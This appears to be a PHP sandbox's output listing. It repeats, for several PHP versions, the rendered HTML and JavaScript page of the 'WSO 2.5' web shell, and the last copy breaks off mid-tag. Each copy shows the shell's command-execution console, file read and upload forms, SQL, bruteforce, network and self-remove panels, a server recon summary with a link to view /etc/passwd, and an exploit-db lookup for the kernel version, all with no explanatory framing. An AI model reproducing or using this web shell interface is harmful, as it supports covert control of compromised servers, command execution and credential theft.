if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.42 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.41
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.41 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.40
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.40 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.39
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.39 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.38
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td 